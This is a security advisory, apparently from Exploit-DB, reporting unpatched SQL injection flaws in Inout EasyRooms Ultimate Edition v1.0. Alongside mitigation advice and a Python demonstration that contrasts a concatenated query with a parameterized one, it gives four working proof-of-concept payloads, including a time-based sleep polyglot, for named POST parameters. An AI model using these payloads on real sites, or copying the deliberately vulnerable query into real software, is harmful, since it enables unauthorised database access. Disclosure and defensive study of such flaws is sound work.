Vendor: Inout EasyRooms Ultimate Edition
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Inout EasyRooms Ultimate Edition
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:inoutscripts:inout_easyrooms_ultimate_edition
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Inout EasyRooms Ultimate Edition – SQL Injection

Inout EasyRooms Ultimate Edition is prone to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information stored in the database. The vulnerabilities exist in the 'guests' parameter of the 'search/rentals' script and in the 'location', 'numguest' and 'property1' parameters of the 'search/searchdetailed' script. An attacker can send a malicious payload in these POST parameters to execute arbitrary SQL commands in the context of the application's database user.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL commands that can be executed. Parameterized queries should be used to prevent SQL injection.
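
The mitigation above as an added example, not code from the vendor or from the advisory: it runs the `location` and `guests` payloads quoted in the PoC section against a concatenated query and against a validated, parameterized one. The SQLite stand-in database, the `rentals` table, the sample rows and the function names are all assumptions made for illustration.

```python
import sqlite3

# Payloads quoted from the PoC section; table and function names are hypothetical.
POC_GUESTS = "-1' OR 3*2*1=6 AND 00046=00046 -- "
POC_LOCATION = "-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='"

def make_db():
    """Constructed sample data standing in for the rental listings."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE rentals "
               "(id INTEGER PRIMARY KEY, location TEXT, max_guests INTEGER)")
    db.executemany("INSERT INTO rentals (location, max_guests) VALUES (?, ?)",
                   [("Izmir", 2), ("Ankara", 4), ("Bursa", 6)])
    return db

def search_vulnerable(db, location):
    """Anti-pattern: the POST value is concatenated into the SQL text."""
    sql = "SELECT id FROM rentals WHERE location = '" + location + "'"
    return [row[0] for row in db.execute(sql)]

def search_parameterized(db, location, guests):
    """Hardened form: validate the numeric field, bind every value."""
    if not (guests.isascii() and guests.isdigit() and 1 <= int(guests) <= 50):
        raise ValueError("guests must be an integer between 1 and 50")
    sql = "SELECT id FROM rentals WHERE location = ? AND max_guests >= ?"
    return [row[0] for row in db.execute(sql, (location, int(guests)))]

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "Ankara"))              # [2]
    print(search_vulnerable(db, POC_LOCATION))          # [1, 2, 3]: WHERE clause rewritten
    print(search_parameterized(db, POC_LOCATION, "2"))  # []: payload compared as plain text
    try:
        search_parameterized(db, "Ankara", POC_GUESTS)
    except ValueError as exc:
        print("rejected:", exc)
```

Free-text fields such as `location` cannot be reduced to a strict allow-list the way `guests` can, so binding is what keeps the payload out of the SQL grammar there.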

Exploit-DB raw data:

# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection
# Date: 29.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/
# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/
# Version: v1.0
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/search/rentals
Vulnerable Parameter: guests (POST)
Payload: guests=-1' OR 3*2*1=6 AND 00046=00046 --

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: location (POST)
Payload:  location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: numguest (POST)
Payload:  numguest=-1' OR 3*2*1=6 AND 000232=000232 --


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: property1 (POST)
Payload:
property1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/